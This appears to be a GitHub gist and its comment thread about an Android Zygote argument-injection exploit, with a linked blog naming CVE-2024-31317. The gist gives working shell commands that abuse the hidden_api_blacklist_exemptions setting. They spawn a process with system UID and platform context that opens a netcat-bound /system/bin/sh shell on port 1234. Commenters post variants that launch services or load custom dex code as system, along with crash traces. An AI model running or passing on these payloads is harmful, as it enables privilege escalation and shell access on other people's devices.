-
-
Save ybtag/db3f3595139556c773fb94b7cbe668b5 to your computer and use it in GitHub Desktop.
| am force-stop com.android.settings | |
| settings put global hidden_api_blacklist_exemptions "LClass1;->method1( | |
| 15 | |
| --runtime-args | |
| --setuid=1000 | |
| --setgid=1000 | |
| --runtime-flags=2049 | |
| --mount-external-full | |
| --target-sdk-version=29 | |
| --setgroups=3003 | |
| --nice-name=runnetcat | |
| --seinfo=platform:su:targetSdkVersion=29:complete | |
| --invoke-with | |
| toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l; | |
| --instruction-set=arm | |
| --app-data-dir=/data/ | |
| --package-name=com.android.settings | |
| android.app.ActivityThread | |
| " | |
| am start -a android.settings.SETTINGS | |
| nc localhost 1234 |
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.
This is way beyond my knowledge im sorry i might not be able to help you with that matter, but im happy if i can test the custom application you're trying to build so i can report or suggest something that might be helpful on your development
For example if I do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
am start-foreground-service -n com.user.helloworld/.PrivilegedService;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
Then Settings app crashes on opening and this command am start-foreground-service -n com.user.helloworld/.PrivilegedService; present in --invoke-with doesnt get invoked properly
Following this - https://blog.flanker017.me/cve-2024-31317/
I tried to do something like this
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
18
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=hello_world_zygote
--seinfo=platform:system_app:targetSdkVersion=29:complete
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
com.android.internal.os.WrapperInit
0
29
-cp
/data/local/tmp/classes.dex
com.test.user.helloworld.WrapperCustom
"
But it is throwing Already Cached excpetion
java.lang.IllegalStateException: Already cached. at android.app.ApplicationLoaders.createAndCacheNonBootclasspathSystemClassLoaders(ApplicationLoaders.java:148) at com.android.internal.os.ZygoteInit.cacheNonBootClasspathClassLoaders(ZygoteInit.java:374) at com.android.internal.os.ZygoteInit.preload(ZygoteInit.java:144) at com.android.internal.os.WrapperInit.main(WrapperInit.java:83) at java.lang.reflect.Method.invoke(Native Method) at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:930)
@Bonveio yes we have to execute this exploit with shell access (UID:2000) which there are ways that I'm aware how to achieve. My main question is even though if I run this netcat with system privileges I am not able to utilize it's benefits such as calling privileged methods during runtime etc. via my custom application. I think there are ways to get back n forth communication using this exploit but I am not able to figure out.